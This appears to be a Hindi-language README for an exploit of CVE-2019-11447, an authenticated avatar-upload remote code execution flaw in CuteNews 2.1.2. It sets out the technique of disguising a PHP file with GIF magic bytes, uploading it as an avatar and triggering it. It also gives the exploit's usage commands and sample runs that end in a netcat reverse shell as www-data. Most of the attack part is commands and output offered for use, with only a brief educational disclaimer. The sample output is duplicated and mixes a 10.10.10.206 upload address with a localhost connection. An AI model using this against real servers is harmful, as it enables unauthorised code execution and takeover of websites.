
CVE-2019-11447 उर्फ CuteNews 2.1.2 Avatar upload RCE (प्रमाणित) के लिए एक्सप्लॉइट कोड
CVE-2019-11447 के लिए एक्सप्लॉइट कोड, उर्फ CuteNews 2.1.2 अवतार अपलोड RCE (प्रमाणित)
एक्सप्लॉइट लिंक:
अपेक्षित परिणाम: एक खाते में लॉगिन/पंजीकरण करें, .gif मैजिक बाइट्स के साथ उपयोगकर्ता द्वारा चयनित PHP फ़ाइल तैयार करें, फ़ाइल को अवतार के रूप में अपलोड करें और रिमोट कोड एक्ज़िक्यूशन प्राप्त करने के लिए इसे ट्रिगर करें।
यह केवल शैक्षिक उद्देश्यों और कॉर्पोरेट वातावरण में परीक्षण के लिए है।
यह एक्सप्लॉइट Python 3.8.6 पर परीक्षण किया गया था।
cfx: ~/cutenews
→ ./exploit.py -h
usage: exploit.py [-h] [-l URL] [-u USERNAME] [-p PASSWORD] [-e EMAIL]
CuteNews 2.1.2 Avatar upload RCE (Authenticated) by ColdFusionX
optional arguments:
-h, --help show this help message and exit
-l URL, --url URL CuteNews URL (Example: http://127.0.0.1)
-u USERNAME, --username USERNAME
Username to Login/Register
-p PASSWORD, --password PASSWORD
Password to Login/Register
-e EMAIL, --email EMAIL
Email to Login/Register
Exploit Usage :
./exploit.py -l http://127.0.0.1 -u cold -p fusion -e [email protected]
./exploit.py -l http://127.0.0.1 -u optimus -p prime -e [email protected]
[^] Select your PHP file -> rev.php
OR
[^] Select your PHP file -> ~/Downloads/rev.php
[^] Press y/n to trigger reverse shell -> y
यह एक्सप्लॉइट प्रारंभ में चलाने के लिए चार तर्कों की अपेक्षा करता है:
अतिरिक्त आवश्यक उपयोगकर्ता इनपुट:
उदाहरण: [^] Select your PHP file -> rev.php
अन्यथा, उपयोगकर्ता को PHP फ़ाइल का स्थान निर्दिष्ट करना होगा:
उदाहरण: [^] Select your PHP file -> ~/Downloads/rev.php
किसी भी स्थिति में, एक्सप्लॉइट आगे उपयोग के लिए अपलोड की गई फ़ाइल का स्थान प्रिंट करने के लिए डिज़ाइन किया गया है।
cfx: ~/cutenews
→ ./exploit.py -l http://127.0.0.1 -u optimus -p prime -e [email protected]
[+] CuteNews 2.1.2 Avatar Upload RCE exploit by ColdFusionX
[+] User exists ! Logged in Successfully
[^] Select your PHP file -> rev.php
[*] Adding Magic Byte to PHP file
[+] Upload Successful !!
[*] File location --> http://10.10.10.206/CuteNews/uploads/avatar_cold_cold.php
[^] Press y/n to trigger PHP file -> y
[*] Check listener for reverse shell
[*] Execution Completed
cfx: ~/cutenews
→ nc -lvnp 8020
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::8020
Ncat: Listening on 0.0.0.0:8020
Ncat: Connection from 127.0.0.1.
Ncat: Connection from 127.0.0.1:32868.
Linux passage 4.15.0-45-generic #48~16.04.1-Ubuntu SMP Tue Jan 29 18:03:48 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
03:06:04 up 4:15, 1 user, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
prime tty7 :0 22:50 4:15m 9.36s 0.69s /sbin/upstart --user
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ exit
cfx: ~/cutenews
→ ./exploit.py -l http://127.0.0.1 -u cold -p fusion -e [email protected]
[+] CuteNews 2.1.2 Avatar Upload RCE exploit by ColdFusionX
[+] Credentials cold:fusion Successfully Registered
[^] Select your PHP file -> rev.php
[*] Adding Magic Byte to PHP file
[+] Upload Successful !!
[*] File location --> http://127.0.0.1/CuteNews/uploads/avatar_cold_cold.php
[^] Press y/n to trigger PHP file -> y
[*] Check listener for reverse shell
[*] Execution Completed
cfx: ~/cutenews
→ nc -lvnp 8020
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::8020
Ncat: Listening on 0.0.0.0:8020
Ncat: Connection from 127.0.0.1.
Ncat: Connection from 127.0.0.1:32868.
Linux passage 4.15.0-45-generic #48~16.04.1-Ubuntu SMP Tue Jan 29 18:03:48 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
03:06:04 up 4:15, 1 user, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
prime tty7 :0 22:50 4:15m 9.36s 0.69s /sbin/upstart --user
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ exit